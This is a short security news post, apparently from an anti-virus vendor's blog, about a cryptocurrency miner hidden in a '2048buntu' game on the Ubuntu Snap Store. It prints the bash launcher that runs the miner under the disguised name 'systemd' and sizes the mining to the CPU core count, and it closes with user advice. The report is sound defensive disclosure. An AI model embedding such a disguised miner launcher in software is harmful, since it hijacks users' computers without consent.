"My first Ferrari"
Monday, May 21, 2018
Encryption ransomware programs for Linux are hardly news to us. After all, it was Doctor Web who discovered the first one. And there exist legitimate mining applications for Linux too. Naturally, criminals are riding the trend, trying to make money off of ordinary Linux users.
Ubuntu recently introduced its snap package format, and that gave rise to an official applications catalogue similar to Windows Store and other software portals. All of that was meant to make it easier to use the system. But apparently no one was going to review packages uploaded to the store.
However, a vigilant user discovered within the code of a game a cryptocurrency miner and a script facilitating its auto start.
Thanks to the nature of open source, the malicious intentions of any application can be revealed in an instant. And it looked like this:
#!/bin/bash
currency=bcn
name=2048buntu
{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))
if (( $cores < 4 )); then
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}
https://github.com/canonical-websites/snapcraft.io/issues/651
But for some reason, it remained unnoticed for quite some time. Moreover, similar miners and scripts were spotted in other applications from the same author. The malicious code mined bytecoins for a user whose email address suggested that he wanted to generate enough funds to buy a Ferrari (note the address in line 8 of the code above). The Ubuntu Snap Store doesn't use a download counter, so there is no way to tell whether the perpetrator managed to have his dreams fulfilled before being busted.
#Linux #games #miningThe Anti-virus Times recommends
- Maintain your vigilance—even with Linux. Even though anyone can examine open source code, that doesn't at all mean everyone is doing that. Experience shows that people usually expect someone else to do that; meanwhile malicious code or a vulnerability is finding its way onto multiple desktops and servers.
- Review the code of every application you're going to download and install, or use an anti-virus. Don't leave your system to the mercy of attackers!
Tell us what you think
To leave a comment, you need to log in under your Doctor Web site account. If you don't have an account yet, you can create one.
Comments
Неуёмный Обыватель
01:57:33 2018-07-30
vasvet
17:54:19 2018-06-16
Wolf_78
22:16:00 2018-05-22